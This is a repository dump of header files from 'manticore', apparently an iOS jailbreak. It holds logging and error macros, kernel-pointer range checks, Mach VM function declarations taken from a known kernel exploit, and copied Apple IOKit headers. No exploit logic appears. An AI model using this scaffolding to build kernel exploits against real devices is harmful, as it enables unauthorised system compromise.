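 * COND is evaluated exactly once; on failure manticore_throw is called with
 * the source location and message M, and does not return.
 */
#define MANTICORE_THROW_ON_FALSE_WITH_MSG(COND, M) \
    do { if (!(COND)) { manticore_throw("assert failed (%s:%d): %s", __FILE__, __LINE__, M); } } while (0)
#define MANTICORE_THROW_ON_FALSE(COND) MANTICORE_THROW_ON_FALSE_WITH_MSG(COND, #COND)
/* P is parenthesised so an expression such as `a ? b : c` is compared as a whole. */
#define MANTICORE_THROW_ON_NULL(P) MANTICORE_THROW_ON_FALSE_WITH_MSG(((P) != NULL), #P " should not be null")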
18 |
19 | #endif /* error_h */
20 |
--------------------------------------------------------------------------------
/manticore/include/util/file.h:
--------------------------------------------------------------------------------
1 | //
2 | // file.h
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef file_h
9 | #define file_h
10 |
11 | #define fileExists(file) ([[NSFileManager defaultManager] fileExistsAtPath:@(file)])
12 |
13 | #endif /* file_h */
14 |
--------------------------------------------------------------------------------
/manticore/include/util/kutils.h:
--------------------------------------------------------------------------------
1 | //
2 | // kutils.h
3 | // manticore
4 | //
5 | // Created by admin on 7/3/21.
6 | //
7 |
8 | #ifndef kutils_h
9 | #define kutils_h
10 |
11 | #include
12 | #include
13 |
14 | typedef unsigned long long addr_t;
15 | typedef uint64_t kptr_t;
16 |
17 | typedef mach_port_t vm_map_t;
18 |
/* sentinel meaning "no kernel pointer" */
#define KPTR_NULL ((kptr_t) 0)

/*
 * Bounds of the kernel virtual address range accepted by the pointer checks
 * below. Hard-coded for the targeted arm64 kernel; confirm against the build
 * being exploited.
 */
#define VM_MIN_KERNEL_ADDRESS 0xffffffe000000000ULL
#define VM_MAX_KERNEL_ADDRESS 0xfffffff3ffffffffULL

/*
 * A value is rejected when its low 32 bits are the 0xdeadbeef marker or when
 * it lies outside [VM_MIN_KERNEL_ADDRESS, VM_MAX_KERNEL_ADDRESS].
 * `val` is expanded up to three times: pass a side-effect-free expression.
 */
#define KERN_POINTER_INVALID(val) \
    ((((val) & 0xffffffff) == 0xdeadbeef) || ((val) < VM_MIN_KERNEL_ADDRESS) || ((val) > VM_MAX_KERNEL_ADDRESS))
#define KERN_POINTER_VALID(val) (!KERN_POINTER_INVALID(val))

#define TF_PLATFORM 0x00000400 /* task is a platform binary */
26 |
27 |
28 | #endif /* kutils_h */
29 |
--------------------------------------------------------------------------------
/manticore/include/util/log.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // log.hpp
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef _util_log_h
9 | #define _util_log_h
10 |
11 | enum manticore_log_level {
12 | LOG_DEBUG,
13 | LOG_INFO,
14 | LOG_WARN,
15 | LOG_ERROR,
16 | LOG_FATAL
17 | };
18 |
19 | enum manticore_var_dump_type {
20 | _MANTICORE_DUMP_START,
21 |
22 | /* non array types */
23 | /* char types */
24 | MANTICORE_DUMP_C,
25 |
26 | /* integer types */
27 | MANTICORE_DUMP_I8,
28 | MANTICORE_DUMP_U8,
29 | MANTICORE_DUMP_I16,
30 | MANTICORE_DUMP_U16,
31 | MANTICORE_DUMP_I32,
32 | MANTICORE_DUMP_U32,
33 | MANTICORE_DUMP_I64,
34 | MANTICORE_DUMP_U64,
35 |
36 | /* fp types */
37 | MANTICORE_DUMP_F32,
38 | MANTICORE_DUMP_F64,
39 | MANTICORE_DUMP_F128,
40 |
41 | /* pointer types */
42 | MANTICORE_DUMP_PTR,
43 |
44 | /* array types (todo: VLAs) */
45 | /* char types */
46 | MANTICORE_DUMP_C_ARR,
47 |
48 | /* integer types */
49 | MANTICORE_DUMP_I8_ARR,
50 | MANTICORE_DUMP_U8_ARR,
51 | MANTICORE_DUMP_I16_ARR,
52 | MANTICORE_DUMP_U16_ARR,
53 | MANTICORE_DUMP_I32_ARR,
54 | MANTICORE_DUMP_U32_ARR,
55 | MANTICORE_DUMP_I64_ARR,
56 | MANTICORE_DUMP_U64_ARR,
57 |
58 | /* fp types */
59 | MANTICORE_DUMP_F32_ARR,
60 | MANTICORE_DUMP_F64_ARR,
61 | MANTICORE_DUMP_F128_ARR,
62 |
63 | /* pointer types */
64 | MANTICORE_DUMP_PTR_ARR,
65 |
66 | /* other */
67 | MANTICORE_DUMP_STR,
68 |
69 | _MANTICORE_DUMP_END
70 | };
71 |
/*!
@function manticore_register_dump_var
Registers a variable that will be dumped on a non recoverable exception

@param type
The type of variable to be added.
For char: MANTICORE_DUMP_C
For 32 bit signed int: MANTICORE_DUMP_I32
For 128 bit IEEE754: MANTICORE_DUMP_F128
etc
For arrays, append the _ARR suffix to the type

@param v
A pointer to the variable to be registered

@param len
If this variable is an array, set this to the length of the array, else set this to 1

@param pretty_name
When dumping the state, if a pretty name is supplied then the pretty name will be printed alongside the variable
*/
/*
 * NOTE(review): these four declarations are C++ overloads and sit outside the
 * extern "C" block below, yet they are not wrapped in #ifdef __cplusplus --
 * a C translation unit that includes this header will fail to compile here.
 * C callers are expected to use the manticore_register_dump_var_* variants
 * declared further down.
 */
bool manticore_register_dump_var(enum manticore_var_dump_type type, void *v, unsigned long long len, const char *pretty_name);
bool manticore_register_dump_var(enum manticore_var_dump_type type, void *v);
bool manticore_register_dump_var(enum manticore_var_dump_type type, void *v, const char *pretty_name);
bool manticore_register_dump_var(enum manticore_var_dump_type type, void *v, unsigned long long len);
97 |
98 | #ifdef __cplusplus
99 | extern "C" {
100 | #endif
101 |
102 | /*!
103 | @function manticore_throw
104 | Throws a non catchable error, will not return
105 |
106 | @param fmt
107 | Format string, like passed to functions such as `printf`, `sprintf` etc
108 |
109 | @param ...
110 | variadic args
111 | */
112 | __attribute__((noreturn)) void manticore_throw(const char *fmt, ...);
113 | /*!
114 | @function manticore_(error|warn|info|debug)
115 | Prints a (error|warn|info|debug) message
116 |
117 | @param fmt
118 | Format string, like passed to functions such as `printf`, `sprintf` etc
119 |
120 | @param ...
121 | variadic args
122 | */
123 | void manticore_error(const char *fmt, ...);
124 | void manticore_warn(const char *fmt, ...);
125 | void manticore_info(const char *fmt, ...);
126 | void manticore_debug(const char *fmt, ...);
127 |
128 | /* when calling from C, only 4 arg variant is available */
129 | void manticore_register_dump_var_type_v_len_name(enum manticore_var_dump_type type, void *v, unsigned long long len, const char *pretty_name);
130 | void manticore_register_dump_var_type_v(enum manticore_var_dump_type type, void *v, unsigned long long len, const char *pretty_name);
131 | void manticore_register_dump_var_type_v_name(enum manticore_var_dump_type type, void *v, unsigned long long len, const char *pretty_name);
132 | void manticore_register_dump_var_type_v_len(enum manticore_var_dump_type type, void *v, unsigned long long len, const char *pretty_name);
133 |
134 | #ifdef __cplusplus
135 | }
136 | #endif
137 |
138 | #endif /* log_h */
139 |
--------------------------------------------------------------------------------
/manticore/include/util/mach_vm.h:
--------------------------------------------------------------------------------
1 | /*
2 | * mach_vm.h
3 | * Brandon Azad
4 | */
5 | #ifndef OOB_TIMESTAMP__MACH_VM__H_
6 | #define OOB_TIMESTAMP__MACH_VM__H_
7 |
8 | #include
9 |
10 | extern
11 | kern_return_t mach_vm_allocate
12 | (
13 | vm_map_t target,
14 | mach_vm_address_t *address,
15 | mach_vm_size_t size,
16 | int flags
17 | );
18 |
19 | extern
20 | kern_return_t mach_vm_deallocate
21 | (
22 | vm_map_t target,
23 | mach_vm_address_t address,
24 | mach_vm_size_t size
25 | );
26 |
27 | extern
28 | kern_return_t mach_vm_protect
29 | (
30 | vm_map_t target_task,
31 | mach_vm_address_t address,
32 | mach_vm_size_t size,
33 | boolean_t set_maximum,
34 | vm_prot_t new_protection
35 | );
36 |
37 | extern
38 | kern_return_t mach_vm_write
39 | (
40 | vm_map_t target_task,
41 | mach_vm_address_t address,
42 | vm_offset_t data,
43 | mach_msg_type_number_t dataCnt
44 | );
45 |
46 | extern
47 | kern_return_t mach_vm_read_overwrite
48 | (
49 | vm_map_t target_task,
50 | mach_vm_address_t address,
51 | mach_vm_size_t size,
52 | mach_vm_address_t data,
53 | mach_vm_size_t *outsize
54 | );
55 |
56 | extern
57 | kern_return_t mach_vm_remap
58 | (
59 | vm_map_t target_task,
60 | mach_vm_address_t *target_address,
61 | mach_vm_size_t size,
62 | mach_vm_offset_t mask,
63 | int flags,
64 | vm_map_t src_task,
65 | mach_vm_address_t src_address,
66 | boolean_t copy,
67 | vm_prot_t *cur_protection,
68 | vm_prot_t *max_protection,
69 | vm_inherit_t inheritance
70 | );
71 |
72 | extern
73 | kern_return_t mach_vm_region_recurse
74 | (
75 | vm_map_t target_task,
76 | mach_vm_address_t *address,
77 | mach_vm_size_t *size,
78 | natural_t *nesting_depth,
79 | vm_region_recurse_info_t info,
80 | mach_msg_type_number_t *infoCnt
81 | );
82 |
83 | #endif
84 |
--------------------------------------------------------------------------------
/manticore/include/util/plistutils.h:
--------------------------------------------------------------------------------
1 | //
2 | // plistutils.h
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef plistutils_h
9 | #define plistutils_h
10 |
11 | #import
12 |
/*
 * Property-list helpers. The descriptions below are inferred from the
 * signatures only; confirm against the implementation before relying on them.
 */
/* Presumably loads `filename` as a plist, passes the parsed object to `function`
 * for in-place mutation and writes it back; returns whether that succeeded. */
bool modifyPlist(NSString *filename, void (^function)(id));
/* Parses `filename` and returns its top-level dictionary (presumably nil on failure). */
NSDictionary *readPlist(NSString *filename);
/* Writes a new, empty plist at `filename`; returns whether the write succeeded. */
bool createEmptyPlist(NSString *filename);
17 |
18 | #endif /* plistutils_h */
19 |
--------------------------------------------------------------------------------
/manticore/include/util/sys_vers.h:
--------------------------------------------------------------------------------
1 | //
2 | // sys_vers.h
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef sys_vers_h
9 | #define sys_vers_h
10 |
/*
 * Compare the running iOS version string with `v` (an NSString such as @"14.3")
 * using NSNumericSearch, so digit runs compare numerically ("14.10" > "14.9").
 * The shared comparison is factored into one helper macro; each public macro
 * evaluates to a BOOL expression exactly as before.
 */
#define MANTICORE_SYSTEM_VERSION_COMPARE(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch])
#define SYSTEM_VERSION_EQUAL_TO(v) (MANTICORE_SYSTEM_VERSION_COMPARE(v) == NSOrderedSame)
#define SYSTEM_VERSION_GREATER_THAN(v) (MANTICORE_SYSTEM_VERSION_COMPARE(v) == NSOrderedDescending)
#define SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(v) (MANTICORE_SYSTEM_VERSION_COMPARE(v) != NSOrderedAscending)
#define SYSTEM_VERSION_LESS_THAN(v) (MANTICORE_SYSTEM_VERSION_COMPARE(v) == NSOrderedAscending)
#define SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(v) (MANTICORE_SYSTEM_VERSION_COMPARE(v) != NSOrderedDescending)
16 |
17 | #endif /* sys_vers_h */
18 |
--------------------------------------------------------------------------------
/manticore/include/util/util.h:
--------------------------------------------------------------------------------
1 | //
2 | // util.h
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef util_h
9 | #define util_h
10 |
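/*!
@function programVersion
Gets the CFBundleVersion

@return
The CFBundleVersion of this app
*/
/* The declaration previously lacked its terminating semicolon, which broke
 * every translation unit including this header; (void) makes the empty
 * parameter list an explicit prototype. */
NSString *programVersion(void);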
19 |
20 | #endif /* util_h */
21 |
--------------------------------------------------------------------------------
/manticore/include/xnu/iokit/IOKit/IOReturn.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | /*
29 | * HISTORY
30 | */
31 |
32 | /*
33 | * Core IOReturn values. Others may be family defined.
34 | */
35 |
36 | #ifndef __IOKIT_IORETURN_H
37 | #define __IOKIT_IORETURN_H
38 |
39 | #ifdef __cplusplus
40 | extern "C" {
41 | #endif
42 |
43 | #ifndef PLATFORM_DriverKit
44 |
45 | #include
46 |
47 | #else /* PLATFORM_DriverKit */
48 |
49 | #ifdef DRIVERKIT_PRIVATE
50 |
51 | #include
52 |
53 | #else /* DRIVERKIT_PRIVATE */
54 |
55 | typedef int kern_return_t;
56 |
57 | #define KERN_SUCCESS 0
58 |
59 | /*
60 | * error number layout as follows:
61 | *
62 | * hi lo
63 | * | system(6) | subsystem(12) | code(14) |
64 | */
65 |
66 | #define err_none (kern_return_t)0
67 | #define ERR_SUCCESS (kern_return_t)0
68 |
69 | #define err_system(x) ((signed)((((unsigned)(x))&0x3f)<<26))
70 | #define err_sub(x) (((x)&0xfff)<<14)
71 |
72 | #define err_get_system(err) (((err)>>26)&0x3f)
73 | #define err_get_sub(err) (((err)>>14)&0xfff)
74 | #define err_get_code(err) ((err)&0x3fff)
75 |
76 | #define err_max_system 0x3f
77 |
78 | #define system_emask (err_system(err_max_system))
79 | #define sub_emask (err_sub(0xfff))
80 | #define code_emask (0x3fff)
81 |
82 | #endif /* DRIVERKIT_PRIVATE */
83 |
84 | #endif /* PLATFORM_DriverKit */
85 |
86 | typedef kern_return_t IOReturn;
87 |
88 | #ifndef sys_iokit
89 | #define sys_iokit err_system(0x38)
90 | #endif /* sys_iokit */
91 | #define sub_iokit_common err_sub(0)
92 | #define sub_iokit_usb err_sub(1)
93 | #define sub_iokit_firewire err_sub(2)
94 | #define sub_iokit_block_storage err_sub(4)
95 | #define sub_iokit_graphics err_sub(5)
96 | #define sub_iokit_networking err_sub(6)
97 | #define sub_iokit_bluetooth err_sub(8)
98 | #define sub_iokit_pmu err_sub(9)
99 | #define sub_iokit_acpi err_sub(10)
100 | #define sub_iokit_smbus err_sub(11)
101 | #define sub_iokit_ahci err_sub(12)
102 | #define sub_iokit_powermanagement err_sub(13)
103 | #define sub_iokit_hidsystem err_sub(14)
104 | #define sub_iokit_scsi err_sub(16)
105 | #define sub_iokit_usbaudio err_sub(17)
106 | #define sub_iokit_wirelesscharging err_sub(18)
107 | //#define sub_iokit_pccard err_sub(21)
108 | #ifdef PRIVATE
109 | #define sub_iokit_nvme err_sub(28)
110 | #endif
111 | #define sub_iokit_thunderbolt err_sub(29)
112 | #define sub_iokit_graphics_acceleration err_sub(30)
113 | #define sub_iokit_keystore err_sub(31)
114 | #ifdef PRIVATE
115 | #define sub_iokit_smc err_sub(32)
116 | #endif
117 | #define sub_iokit_apfs err_sub(33)
118 | #define sub_iokit_acpiec err_sub(34)
119 | #define sub_iokit_timesync_avb err_sub(35)
120 |
121 | #define sub_iokit_platform err_sub(0x2A)
122 | #define sub_iokit_audio_video err_sub(0x45)
123 | #define sub_iokit_cec err_sub(0x46)
124 | #define sub_iokit_baseband err_sub(0x80)
125 | #define sub_iokit_HDA err_sub(0xFE)
126 | #define sub_iokit_hsic err_sub(0x147)
127 | #define sub_iokit_sdio err_sub(0x174)
128 | #define sub_iokit_wlan err_sub(0x208)
129 | #define sub_iokit_appleembeddedsleepwakehandler err_sub(0x209)
130 | #define sub_iokit_appleppm err_sub(0x20A)
131 |
132 | #define sub_iokit_vendor_specific err_sub(-2)
133 | #define sub_iokit_reserved err_sub(-1)
134 |
135 | #define iokit_common_err(return ) (sys_iokit|sub_iokit_common|return)
136 | #define iokit_family_err(sub, return ) (sys_iokit|sub|return)
137 | #define iokit_vendor_specific_err(return ) (sys_iokit|sub_iokit_vendor_specific|return)
138 |
139 | #define kIOReturnSuccess KERN_SUCCESS // OK
140 | #define kIOReturnError iokit_common_err(0x2bc) // general error
141 | #define kIOReturnNoMemory iokit_common_err(0x2bd) // can't allocate memory
142 | #define kIOReturnNoResources iokit_common_err(0x2be) // resource shortage
143 | #define kIOReturnIPCError iokit_common_err(0x2bf) // error during IPC
144 | #define kIOReturnNoDevice iokit_common_err(0x2c0) // no such device
145 | #define kIOReturnNotPrivileged iokit_common_err(0x2c1) // privilege violation
146 | #define kIOReturnBadArgument iokit_common_err(0x2c2) // invalid argument
147 | #define kIOReturnLockedRead iokit_common_err(0x2c3) // device read locked
148 | #define kIOReturnLockedWrite iokit_common_err(0x2c4) // device write locked
149 | #define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and
150 | // device already open
151 | #define kIOReturnBadMessageID iokit_common_err(0x2c6) // sent/received messages
152 | // had different msg_id
153 | #define kIOReturnUnsupported iokit_common_err(0x2c7) // unsupported function
154 | #define kIOReturnVMError iokit_common_err(0x2c8) // misc. VM failure
155 | #define kIOReturnInternalError iokit_common_err(0x2c9) // internal error
156 | #define kIOReturnIOError iokit_common_err(0x2ca) // General I/O error
157 | //#define kIOReturn???Error iokit_common_err(0x2cb) // ???
158 | #define kIOReturnCannotLock iokit_common_err(0x2cc) // can't acquire lock
159 | #define kIOReturnNotOpen iokit_common_err(0x2cd) // device not open
160 | #define kIOReturnNotReadable iokit_common_err(0x2ce) // read not supported
161 | #define kIOReturnNotWritable iokit_common_err(0x2cf) // write not supported
162 | #define kIOReturnNotAligned iokit_common_err(0x2d0) // alignment error
163 | #define kIOReturnBadMedia iokit_common_err(0x2d1) // Media Error
164 | #define kIOReturnStillOpen iokit_common_err(0x2d2) // device(s) still open
165 | #define kIOReturnRLDError iokit_common_err(0x2d3) // rld failure
166 | #define kIOReturnDMAError iokit_common_err(0x2d4) // DMA failure
167 | #define kIOReturnBusy iokit_common_err(0x2d5) // Device Busy
168 | #define kIOReturnTimeout iokit_common_err(0x2d6) // I/O Timeout
169 | #define kIOReturnOffline iokit_common_err(0x2d7) // device offline
170 | #define kIOReturnNotReady iokit_common_err(0x2d8) // not ready
171 | #define kIOReturnNotAttached iokit_common_err(0x2d9) // device not attached
172 | #define kIOReturnNoChannels iokit_common_err(0x2da) // no DMA channels left
173 | #define kIOReturnNoSpace iokit_common_err(0x2db) // no space for data
174 | //#define kIOReturn???Error iokit_common_err(0x2dc) // ???
175 | #define kIOReturnPortExists iokit_common_err(0x2dd) // port already exists
176 | #define kIOReturnCannotWire iokit_common_err(0x2de) // can't wire down
177 | // physical memory
178 | #define kIOReturnNoInterrupt iokit_common_err(0x2df) // no interrupt attached
179 | #define kIOReturnNoFrames iokit_common_err(0x2e0) // no DMA frames enqueued
180 | #define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received
181 | // on interrupt port
182 | #define kIOReturnNotPermitted iokit_common_err(0x2e2) // not permitted
183 | #define kIOReturnNoPower iokit_common_err(0x2e3) // no power to device
184 | #define kIOReturnNoMedia iokit_common_err(0x2e4) // media not present
185 | #define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted
186 | #define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode
187 | #define kIOReturnUnderrun iokit_common_err(0x2e7) // data underrun
188 | #define kIOReturnOverrun iokit_common_err(0x2e8) // data overrun
189 | #define kIOReturnDeviceError iokit_common_err(0x2e9) // the device is not working properly!
190 | #define kIOReturnNoCompletion iokit_common_err(0x2ea) // a completion routine is required
191 | #define kIOReturnAborted iokit_common_err(0x2eb) // operation aborted
192 | #define kIOReturnNoBandwidth iokit_common_err(0x2ec) // bus bandwidth would be exceeded
193 | #define kIOReturnNotResponding iokit_common_err(0x2ed) // device not responding
194 | #define kIOReturnIsoTooOld iokit_common_err(0x2ee) // isochronous I/O request for distant past!
195 | #define kIOReturnIsoTooNew iokit_common_err(0x2ef) // isochronous I/O request for distant future
196 | #define kIOReturnNotFound iokit_common_err(0x2f0) // data was not found
197 | #define kIOReturnInvalid iokit_common_err(0x1) // should never be seen
198 |
199 | #ifdef __cplusplus
200 | }
201 | #endif
202 |
203 | #endif /* ! __IOKIT_IORETURN_H */
204 |
--------------------------------------------------------------------------------
/manticore/include/xnu/iokit/IOKit/IOTypes.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | #ifndef __IOKIT_IOTYPES_H
29 | #define __IOKIT_IOTYPES_H
30 |
31 | #ifndef PLATFORM_DriverKit
32 |
33 | #ifndef IOKIT
34 | #define IOKIT 1
35 | #endif /* !IOKIT */
36 |
37 | #if KERNEL
38 | #include
39 | #else
40 | #include
41 | #include
42 | #endif
43 |
44 | #include
45 | #include
46 |
47 | #ifdef __cplusplus
48 | extern "C" {
49 | #endif
50 |
51 | #ifndef NULL
52 | #if defined (__cplusplus)
53 | #ifdef XNU_KERNEL_PRIVATE
54 | #define NULL nullptr
55 | #else
56 | #if __cplusplus >= 201103L && (defined(__arm__) || defined(__arm64__))
57 | #define NULL nullptr
58 | #else
59 | #define NULL 0
60 | #endif
61 | #endif
62 | #else
63 | #define NULL ((void *)0)
64 | #endif
65 | #endif
66 |
67 | /*
68 | * Simple data types.
69 | */
70 | #include
71 | //#include
72 |
73 | #if KERNEL
74 | #include
75 | #endif
76 |
77 | typedef UInt32 IOOptionBits;
78 | typedef SInt32 IOFixed;
79 | typedef UInt32 IOVersion;
80 | typedef UInt32 IOItemCount;
81 | typedef UInt32 IOCacheMode;
82 |
83 | typedef UInt32 IOByteCount32;
84 | typedef UInt64 IOByteCount64;
85 |
86 | typedef UInt32 IOPhysicalAddress32;
87 | typedef UInt64 IOPhysicalAddress64;
88 | typedef UInt32 IOPhysicalLength32;
89 | typedef UInt64 IOPhysicalLength64;
90 |
/*
 * Target-dependent address and length widths.
 *
 * IOVirtualAddress is mach_vm_address_t (64-bit) everywhere except arm/i386,
 * where it is the native vm_address_t.
 */
#if !defined(__arm__) && !defined(__i386__)
typedef mach_vm_address_t IOVirtualAddress;
#else
typedef vm_address_t IOVirtualAddress;
#endif

/*
 * IOByteCount is 64-bit only for 64-bit kernel builds and LP64 arm64 userland.
 * It stays 32-bit on arm/i386, in x86_64 *userland*, and on arm64 without
 * __LP64__ (arm64_32). Storing a 64-bit size into an IOByteCount on those
 * targets silently truncates, so size arithmetic that crosses this boundary
 * needs an explicit range check rather than a cast.
 */
#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL)) && !(defined(__arm64__) && !defined(__LP64__))
typedef IOByteCount64 IOByteCount;
#define PRIIOByteCount PRIu64
#else
typedef IOByteCount32 IOByteCount;
#define PRIIOByteCount PRIu32
#endif

typedef IOVirtualAddress IOLogicalAddress;

/*
 * Physical address/length: 64-bit except on arm, i386 and x86_64 userland.
 * IOPhysical32(hi, lo) composes a 64-bit address from two halves in the 64-bit
 * case; in the 32-bit case it yields lo and discards hi entirely.
 */
#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))

typedef IOPhysicalAddress64 IOPhysicalAddress;
typedef IOPhysicalLength64 IOPhysicalLength;
#define IOPhysical32( hi, lo ) ((UInt64) lo + ((UInt64)(hi) << 32))
#define IOPhysSize 64

#else

typedef IOPhysicalAddress32 IOPhysicalAddress;
typedef IOPhysicalLength32 IOPhysicalLength;
#define IOPhysical32( hi, lo ) (lo)
#define IOPhysSize 32

#endif
122 |
123 |
/* A contiguous physical extent, in the target's IOPhysicalAddress/IOByteCount widths. */
typedef struct{
IOPhysicalAddress address;
IOByteCount length;
} IOPhysicalRange;

/* A contiguous virtual extent, in the target's IOVirtualAddress/IOByteCount widths. */
typedef struct{
IOVirtualAddress address;
IOByteCount length;
} IOVirtualRange;

/*
 * IOAddressRange aliases IOVirtualRange except on arm/i386, where it is defined
 * separately with 64-bit mach_vm_address_t/mach_vm_size_t fields. On those
 * targets the two range types are therefore different sizes and must not be
 * cast into one another.
 */
#if !defined(__arm__) && !defined(__i386__)
typedef IOVirtualRange IOAddressRange;
#else
typedef struct{
mach_vm_address_t address;
mach_vm_size_t length;
} IOAddressRange;
#endif
142 |
143 | /*
144 | * Map between #defined or enum'd constants and text description.
145 | */
/* One (integer constant, human-readable name) pair for constant-to-text tables. */
typedef struct {
int value;
const char *name;
} IONamedValue;
150 |
151 |
152 | /*
153 | * Memory alignment -- specified as a power of two.
154 | */
/* Alignment expressed as a power-of-two exponent (see the comment above). */
typedef unsigned int IOAlignment;

/* Null vm_task_t sentinel. */
#define IO_NULL_VM_TASK ((vm_task_t)0)
158 |
159 |
160 | /*
161 | * Pull in machine specific stuff.
162 | */
163 |
164 | //#include
165 |
/*
 * Handle type for IOKit objects. In the kernel an io_object_t is an OSObject
 * pointer; in userland it is a Mach port name (mach_port_t). Every io_*_t
 * alias below is the same underlying type, so passing an io_iterator_t where
 * an io_service_t or io_connect_t is expected is not caught at compile time.
 */
#ifndef MACH_KERNEL

#ifndef __IOKIT_PORTS_DEFINED__
#define __IOKIT_PORTS_DEFINED__
#ifdef KERNEL
#ifdef __cplusplus
class OSObject;
typedef OSObject * io_object_t;
#else
typedef struct OSObject * io_object_t;
#endif
#else /* KERNEL */
typedef mach_port_t io_object_t;
#endif /* KERNEL */
#endif /* __IOKIT_PORTS_DEFINED__ */

#include

typedef io_object_t io_connect_t;
typedef io_object_t io_enumerator_t;
typedef io_object_t io_iterator_t;
typedef io_object_t io_registry_entry_t;
typedef io_object_t io_service_t;
typedef io_object_t uext_object_t;

/* Null handle; in userland this is MACH_PORT_NULL's value. */
#define IO_OBJECT_NULL ((io_object_t) 0)

#endif /* MACH_KERNEL */
194 |
// IOConnectMapMemory memoryTypes; only the default is defined here, drivers
// define their own values.
enum {
kIODefaultMemoryType = 0
};

// Cache modes. These are the raw values; the kIOMapCache* constants below are
// the same values shifted into the map-option cache field.
enum {
kIODefaultCache = 0,
kIOInhibitCache = 1,
kIOWriteThruCache = 2,
kIOCopybackCache = 3,
kIOWriteCombineCache = 4,
kIOCopybackInnerCache = 5,
kIOPostedWrite = 6,
kIORealTimeCache = 7,
kIOPostedReordered = 8,
kIOPostedCombinedReordered = 9,
};
212 |
// IOMemory mapping options.
// Bits 8-11 (kIOMapCacheMask) hold one of the cache modes above. The low
// 12 bits (kIOMapUserOptionsMask) cover kIOMapAnywhere plus that cache field;
// kIOMapReadOnly and the 0x01000000-and-up flags lie outside that mask.
// NOTE(review): presumably the kernel ANDs caller-supplied options with
// kIOMapUserOptionsMask before honouring them — verify in the user-client
// mapping path before relying on a userland caller being unable to request
// kIOMapReference/kIOMapUnique/kIOMapOverwrite.
enum {
kIOMapAnywhere = 0x00000001,

kIOMapCacheMask = 0x00000f00,
kIOMapCacheShift = 8,
kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift,
kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift,
kIOMapWriteThruCache = kIOWriteThruCache << kIOMapCacheShift,
kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift,
kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift,
kIOMapCopybackInnerCache = kIOCopybackInnerCache << kIOMapCacheShift,
kIOMapPostedWrite = kIOPostedWrite << kIOMapCacheShift,
kIOMapRealTimeCache = kIORealTimeCache << kIOMapCacheShift,
kIOMapPostedReordered = kIOPostedReordered << kIOMapCacheShift,
kIOMapPostedCombinedReordered = kIOPostedCombinedReordered << kIOMapCacheShift,

kIOMapUserOptionsMask = 0x00000fff,

kIOMapReadOnly = 0x00001000,

kIOMapStatic = 0x01000000,
kIOMapReference = 0x02000000,
kIOMapUnique = 0x04000000,
#ifdef XNU_KERNEL_PRIVATE
kIOMap64Bit = 0x08000000,
#endif
kIOMapPrefault = 0x10000000,
kIOMapOverwrite = 0x20000000
};
243 |
244 | /*! @enum Scale Factors
